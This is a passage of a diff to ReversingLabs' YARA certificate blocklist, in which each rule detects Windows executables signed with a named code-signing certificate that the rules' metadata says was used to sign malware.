"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bc2df95ddf1ef3d5f83d14852e1cf6cbf4b71bfbe88fc97c2a4553e8581ddf47" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5118-L5136" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "170533935b91776ec2413106c55ed4a01c33f32a469a855824cac796f2e132a0" score = 75 quality = 90 tags = "INFO, FILE" @@ -15662,22 +35453,22 @@ rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Karolina Klimowska" and pe.signatures[i].serial=="4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" and 1660314070<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digital Capital Management Ireland Limited" and (pe.signatures[i].serial=="00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" or pe.signatures[i].serial=="da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79") and 1600244736<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F8C2E08438Bb0E9Adc955E4B493E5821 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bc37efaa-9ceb-5079-999f-b3d17c585b1c" + id = "65297530-2482-5773-8914-461fb56cb41d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11122-L11140" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2a0be6157e589705ad19756971bd865edad2d54760d03c2e6f47a461b402ad68" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5138-L5156" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5dbe554032c945c46ffd61ef1e0deb59d396a70dd63994bf44c65d849ec8220a" score = 75 quality = 90 tags = "INFO, FILE" @@ -15687,22 +35478,22 @@ rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UPLagga Systems s.r.o." and (pe.signatures[i].serial=="00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" or pe.signatures[i].serial=="92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00") and 1598054400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DocsGen Software Solutions Inc." and (pe.signatures[i].serial=="00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" or pe.signatures[i].serial=="f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21") and 1599523200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_70E1Ebd170Db8102D8C28E58392E5632 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "50d50330-4098-59dd-b2da-0714eefdfc66" + id = "e3b0f68c-8cc9-5275-988a-8d955ea25a47" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11142-L11160" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a42fec2e0e8d37948420f16907f39c3d502c535be98024d04a777dfbc633004d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5158-L5174" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e1738eddc1da0876a373ee7f35bff155d56c1b98a23cb117c0e7a966f8fa3c92" score = 75 quality = 90 tags = "INFO, FILE" @@ -15712,22 +35503,22 @@ rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ekitai Data Inc." and (pe.signatures[i].serial=="00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" or pe.signatures[i].serial=="b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f") and 1598313600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Equal Cash Technologies Limited" and pe.signatures[i].serial=="70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" and 1599264000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_09C89De6F64A7Fdf657E69353C5Fdd44 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8e533ebf-a124-53a9-8647-6f4b40aaa066" + id = "f86eafb5-ec59-58c5-b5f9-01a6704fb555" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11162-L11178" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "861691ce7bae4366f3b35d01c84bb0031b54653869f52eaccf20808b1b55d2af" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5176-L5192" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1cb57cd68cda91754307d2e4d94ea011975bbfff0f15134081a5aa11870b0db1" score = 75 quality = 90 tags = "INFO, FILE" @@ -15737,22 +35528,22 @@ rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FLY BETTER s.r.o." and pe.signatures[i].serial=="24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" and 1645142400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EXON RENTAL SP Z O O" and pe.signatures[i].serial=="09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" and 1601337601<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ffff2Ce862378B26440Df49Ca9175B70 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d188c65c-ee7b-586f-95f0-8de5b506c325" + id = "d5d1e84d-328f-53ac-adb6-3824fa77a47d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11180-L11198" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ce489a4a2f07181d6fbf295f426deeaf51310e061bac2e56d65b37eeb397ff9a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5194-L5212" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8ed7b0643b07ce4954f570157e1534ee1ed647717cce00fe7f2b572c9b5d0042" score = 75 quality = 90 tags = "INFO, FILE" @@ -15762,22 +35553,22 @@ rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trade in Brasil s.r.o." and (pe.signatures[i].serial=="00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures[i].serial=="88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88") and 1620000000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "F & A.TIM d.o.o." and (pe.signatures[i].serial=="00:ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" or pe.signatures[i].serial=="ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70") and 1576195200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3223B4616C2687C04865Bee8321726A8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fe3abe27-c8c8-54b8-b031-0546c9bfda90" + id = "089aae56-4f46-563c-800a-dbf57db2bde6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11200-L11216" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "591846225d5faf3ee8f3102acaad066f0187219044077bbdaf32345613b00965" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5214-L5230" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fcb0a14866b3612c5ec5a7db7a3333e20a4605695b3d019eef84de85d7b3ea4d" score = 75 quality = 90 tags = "INFO, FILE" @@ -15787,22 +35578,22 @@ rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OdyLab Inc" and pe.signatures[i].serial=="53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" and 1654020559<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTUNE STAR TRADING, INC." and pe.signatures[i].serial=="32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" and 1601337600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7709D2Df39E9A4F7Db2F3Cbc29B49743 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fe602ac3-fa34-5056-a2cc-5ae9de728559" + id = "7227daa3-453d-5bb8-804c-8a97cd0d81c6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11218-L11234" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "30586a643b29f3c943b3f35bb1639c5b9fa48ecbd776775086e35af502aa4a7a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5232-L5248" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c9ade45e0f9fb737a08ffa94d1fff89471a1cbcbacc139730fab88e382226d0b" score = 75 quality = 90 tags = "INFO, FILE" @@ -15812,22 +35603,22 @@ rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Maya logistika d.o.o." and pe.signatures[i].serial=="07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" and 1637971201<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Grina LLC" and pe.signatures[i].serial=="77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" and 1556353331<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E29690E14518874D2Dcf00234Ae94F1F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d679238f-a697-5322-815c-9986c9d24032" + id = "6b4f26d3-b943-5a2e-bfb9-0e290031926a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11236-L11252" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "40b570b28e10ebd2a1ba515dc3fa45bdb5c0b76044e4dda7a6819976072a67a2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5250-L5268" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ef84815798b213dc49a142e3076cc6dd680dccabe72643fc86234024a46468f9" score = 75 quality = 90 tags = "INFO, FILE" @@ -15837,22 +35628,22 @@ rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DILA d.o.o." and pe.signatures[i].serial=="02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" and 1613865600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GRIND & TAMP ENTERPRISES PTY LTD" and (pe.signatures[i].serial=="00:e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" or pe.signatures[i].serial=="e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f") and 1570838400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Cfac705C7E6845904F99995324F7562C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b0e4057f-a0e7-5e2e-a47f-dc8188b6b506" + id = "42aa3105-a077-5962-8d5d-50429254582b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11254-L11270" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9b6fb002d603135391958668be0ef805e441928a035c9c4da4bb9915aa3086e8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5270-L5288" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "68bcfe60c2e7154f427c20d0471ede99e55c8200149a4438d5a2a75982fcd419" score = 75 quality = 90 tags = "INFO, FILE" @@ -15862,22 +35653,22 @@ rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MANILA Solution as" and pe.signatures[i].serial=="64:c2:50:5c:73:06:63:9f:c8:ea:e5:44:b0:30:53:38" and 1609418043<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HMWOCFPSDLAFMFZIVD" and (pe.signatures[i].serial=="cf:ac:70:5c:7e:68:45:90:4f:99:99:53:24:f7:56:2c" or pe.signatures[i].serial=="30:53:8f:a3:81:97:ba:6f:b0:66:66:ac:db:08:a9:d4") and 1601918720<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_A7989F8Be0C82D35A19E7B3Dd4Be30E5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bdca8435-c1fd-598d-bd82-20a3a3b2a959" + id = "21d54d40-442e-50f5-a561-41b3d6239bac" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11272-L11288" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c0c8e5c0e2e120ee6b055e9a6b2af3d424bed0832c2619beab658fe01757f69f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5290-L5308" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a50129908a471e6692bcf663abd5ef52861d4a46fdf528f39efe816ee6150edf" score = 75 quality = 90 tags = "INFO, FILE" @@ -15887,22 +35678,22 @@ rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NAILS UNLIMITED LIMITED" and pe.signatures[i].serial=="2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" and 1625529600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Instamix Limited" and (pe.signatures[i].serial=="00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" or pe.signatures[i].serial=="a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5") and 1598054400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "03533c22-eb16-546c-af55-675af9c833ce" + id = "87a47456-4d90-5a7d-af9d-7a6d5fb8efac" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11290-L11308" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "623a2f931198eacf44fd233065e96a4dcadb5b3bbc7ca56df2b6ae9eafc4faa5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5310-L5326" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "415f39f82b6a45acd196ccf246ec660806a8d66c61df8c7d2850e5b244118d04" score = 75 quality = 90 tags = "INFO, FILE" @@ -15912,22 +35703,22 @@ rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "F.A.T. SARL" and (pe.signatures[i].serial=="00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" or pe.signatures[i].serial=="b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19") and 1590537600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KLAKSON, LLC" and pe.signatures[i].serial=="0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" and 1597276801<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3696883055975D571199C6B5D48F3Cd5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "514eac5a-9264-58ef-b4ee-65ec24b43e5a" + id = "f68338f9-8614-5793-981d-70547dbc65ce" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11310-L11326" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7e0c3147e657802e457f6df271b7f5a64c81fd13f936a8935aa991022e4ab238" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5328-L5344" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d6f77b9ca928167341a35b83e353886d4db8dfcecf45cde0f0f93d65059b5200" score = 75 quality = 90 tags = "INFO, FILE" @@ -15937,22 +35728,22 @@ rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures[i].serial=="45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" and 1639958400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Korist Networks Incorporated" and pe.signatures[i].serial=="36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" and 1600069289<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ee678930D5Bdfaa2Ab0172Fa4C10Ae07 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d7bf59df-708c-5260-bc98-1a86b2c9c988" + id = "e2c2c34a-6177-5457-9ed9-fa34f82ee4cd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11328-L11344" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f00a29ff5dddae40225ab62cb2d4b9dec1539ad58c8cd27d686480eecdb3e31d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5346-L5364" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f1e254450fdbe94172a4fa2d2727c3ade5ae436cf4c0c1153a15e9a2f64f2452" score = 75 quality = 90 tags = "INFO, FILE" @@ -15962,22 +35753,22 @@ rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Evetrans Ltd" and pe.signatures[i].serial=="18:95:43:3e:e9:e2:bd:48:61:9d:75:13:22:62:61:6f" and 1619789516<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LEX CORPORATION PTY LTD" and (pe.signatures[i].serial=="00:ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" or pe.signatures[i].serial=="ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07") and 1571011200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D7C432E8D4Edef515Bfb9D1C214Ff0F5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3d806d90-e029-5521-b191-6967e2691c0f" + id = "5aed508e-2da1-52a0-98f3-52e903e95b7d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11346-L11362" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1a9263c809f5633d01d4d4d0091c8dc214bad73af0eff3c9a94b33bca513f26d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5366-L5384" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "63741513f3ab2f51ecd66dc973239c9dc194b86504fe26b2dd4a7f31299e5497" score = 75 quality = 90 tags = "INFO, FILE" @@ -15987,22 +35778,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ACTIVUS LIMITED" and pe.signatures[i].serial=="1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" and 1615507200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LLC \"MILKY PUT\"" and (pe.signatures[i].serial=="00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" or pe.signatures[i].serial=="d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5") and 